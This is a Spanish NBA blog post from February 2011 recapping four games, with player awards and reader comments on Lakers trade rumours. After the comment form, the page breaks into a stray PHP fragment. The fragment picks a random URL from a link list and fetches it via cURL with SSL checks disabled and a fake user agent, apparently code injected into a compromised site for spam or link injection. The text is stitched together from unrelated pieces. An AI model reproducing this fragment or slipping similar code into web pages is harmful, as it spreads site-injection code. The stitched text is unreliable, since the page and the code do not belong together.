La Crónica (01/02/2011)

02 de February de 2011 por TheDeerHunter

Cuatro encuentros tan sólo, pero todos de gran interés.

Podríamos empezar por cualquiera. Quizás  lo más noticioso resultó ser la derrota de los Spurs en el Rose Garden (86-99). Si las elecciones para el All-Stars aún están por decidirse, LaMarcus Aldridge dio un paso de gigante a costa de Tim Duncan. El baño que le dio, unido al horrible partido de Parker y el buen hacer de Miller y Matthews, aseguró esta victoria tan importante para los intereses de los Blazers. ¡Qué manera de resistir ante las adversidades! Admirable.

Gracias a la derrota tejana, los Celtics recortaron distancias en un difícil partido en Sacramento (95-90). La sorprendente defensa de los Kings y el buen partido de Tyreke y Cousins no fueron suficiente para romper la racha victoriosa de los verdes. Han ganado todos los partidos de su gira por el Oeste.

Con la amenaza velada de Kupchak en la cabeza, los Lakers jugaron con fuego en Houston. En ausencia de Bynum (con su ya clásica lesión de rodilla de principios de febrero) el partido descomunal de Kobe, Odom y Pau no sirvió para vivir una jornada tranquila (106-114). Entre Martin, Brooks y Scola lograron aguantar vivos hasta la prórroga, donde no fueron rivales. La “escopeta de feria” Bryant alcanzó el hito de las 5.000 asistencias. Mientras, Gasol no dio ni una sola, pero veremos si alguien se atreve a insinuar de él que es un chupón. Unos crían la fama…  Las cosas no son blancas o negras, como intentan vendernos algunos.

Por último, los Wizards no pudieron aprovechar la baja de Okafor en New Orleans (89-97). Jason Smith hizo un partido extraordinario sustituyéndole y en el equipo de la capital sólo funcionaron Young y Blatche.

PREMIOS

MVP: El duo Kobe-Gasol estuvo sublime con 58 puntos, 22 rebotes y 11 asistencias entre los dos, pero el premio va para la soberana actuación de LaMarcus Aldridge. Sus 40 puntos y 11 rebotes frente Tim Duncan le acercan un poco más al All-Star.

Rookie: Demarcus Cousins sigue mostrando un nivel altísimo. A las actuaciones de los últimos días se suman los 20 puntos, 6 rebotes y 2 tapones de ayer. Cuidadito Johan Wall que no tienes asegurado ni ser el segundo mejor rookie de la temporada.

Sorpresa: La baja de Emeka Okafor le ha dado minutos a Jason Smith. A principios de temporada ya disputó partidos de nivel pero ninguno como el de ayer. 20 puntos (9 de 11) y 5 rebotes.

Decepción: New Orleans se llevó la victoria a pesar de la “gran actuación” de sus escoltas. Entre Marco Bellinelli y Marcus Thorton anotaron 1 de 12 lanzamientos.

Esfuerzo en vano: La pareja Luis Scola-Kevin Martin lo dio todo pero no pudo hacer nada contra unos Lakers que venían heridos en su amor propio. Los 24 puntos y 15 rebotes del primero y los 30 puntos del segundo sirvieron para plantar cara pero resultaron insuficientes.

Imágenes | AP Photos / Getty Images

Comenta

16 comentarios a esta entrada

  1. PIRATA dice:
    #1

    He leido por ahi un posible trade LAL-INDIANA Granger y hibbert por artest,walton y Rattlif?
    imposible, no?

      Citar

  2. Denise dice:
    #2

    Pues sería absolutamente cojonudo para Lakers, pero no creo que en Indiana sean tan tontos.
    Para que quieren en Indiana otra vez a Artest? el cual solo dio problemas de cabeza.
    Para que que quieren a una basura andante de jugador con un contratazo como Walton?
    Y para qué iban a desprenderse de su jugador franquicia (que realmente no es un jugador franquicia pero es muy bueno) y a un pivot con mucho futuro como Hibbert.
    No me lo creo, sería mas regalo que el de Pau Gasol.

      Citar

  3. Educajasur dice:
    #3

    Dónde hay que firmar Pirata?

      Citar

  4. Busky23 dice:
    #4

    Gran partido del BigThree angelino,78 points 48 rebotes,casi na.
    Partidaco de Kobe,si exceptuamos el partido contra Boston lleva 8 asistencias de promedio en los 7 últimos partidos ” el muy chupón “,en fin…bla bla bla
    Nueva exhibición All-Star de Aldrige,de quitarse el sombrero,con Lamarcus y con todo el equipo,a pesar de todo el mal fario que les persigue siguen siendo competitivos,chapeau.

      Citar

  5. Txusma dice:
    #5

    Se comenta de un interés por Hinrich por parte de los Lakers pero creo que todos estos rumores son cortinas de humo.

      Citar

  6. rojorob dice:
    #6

    En algunos comentarios de este blog me parece percibir que hay gente que no idolatra a Pau Gasol y no le reconoce como el mejor jugador de la historia…ANTIESPAÑOLES!!!

      Citar

  7. Denise dice:
    #7

    Supongo que el comentario de rojorob es irónico, porque si va en serio carece de sentido.
    Yo creo que los Lakers no van a hacer ningun movimiento, realmente no le hace falta más calidad, lo unico que le hace falta es mas actitud, hambre y concentración. Que aprendan de Scola, que pedazo de jugador,
    si este hombre tuviera 7 centimetros mas de alto y de envergadura llevaría siendo el mejor 4 de la NBA desde hace algunos años.

      Citar

  8. MagicJohnson32 dice:
    #8

    Yo no he leído ningún rumor. El LA Times menciona a Hinrich porque es un jugador que ha interesado a los Lakers durante años y los Wizards lo quieren traspasar, pero en ningún momento dan a entender que las franquicias estén negociando.

      Citar

  9. TheDeerHunter dice:
    #9

    Mierda. Hoy era el día de la marmota y no hemos hecho ninguna referencia en el blog.

      Citar

  10. Uno cualquiera dice:
    #10

    TheDeerHunter, siempre podéis volver a hacer la crónica de hoy mañana (por aquello de: http://www.imdb.com/title/tt0107048/ )

    Por cierto, Ray Allen a 8 triples de Reggie Miller.

      Citar

  11. Uno cualquiera dice:
    #11

    Por cierto, que tranquilo está esto desde que los Bucks pierden (y yo que me alegro, es un gusto leeros).

      Citar

  12. MagicJohnson32 dice:
    #12

    I got you, babe!!

      Citar

  13. Busky23 dice:
    #13

    Lo que le iría bien a Lakers es sacarse de encima de una vez a “cristal de bohemia” Bynum,un equipo que quiere aspirar al anillo no se puede permitir el lujo de que su pivot titular no pueda jugar mas de 25 minutos y eso si juega,creo que ha llegado el momento de intentar sacar algo por él.
    Ayer ya se perdió el partido y parece que se perderá alguno más.

      Citar

  14. Len Bias dice:
    #14

    Hola gente, descubrí hace unas semanas el blog y lo leo todos los días, pero nunca me había dado por comentar.
    Ahora que veo lo que habláis de Lakers y Pacers, yo lo que he leido por ahí es que habría un enoooorme multitraspaso en el que estarían involucrados Lakers, Pacers, Jazz y Dallas con nombres jugosos como Hibbert, Granger, Odom, Okur, Bynum o Millsap. Yo lo veo una locura y poco creíble, pero lo he visto en algún foro escrito.

    Por cierto, vaya partido que se acaba de cascar Blake Griffin (32-13-7)

      Citar

  15. Len Bias dice:
    #15

    Perdón, Dallas no. Lo que se había hablado de Dallas era cambiar a Artest por Haywood más una primera ronda de draft. Lo que creo que solo se hacía si se completaba el megatraspaso.

      Citar

  16. MagicJohnson32 dice:
    #16

    ¡Bienvenido Len Bias!

    Buf, no me creo nada de todos esos rumores…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>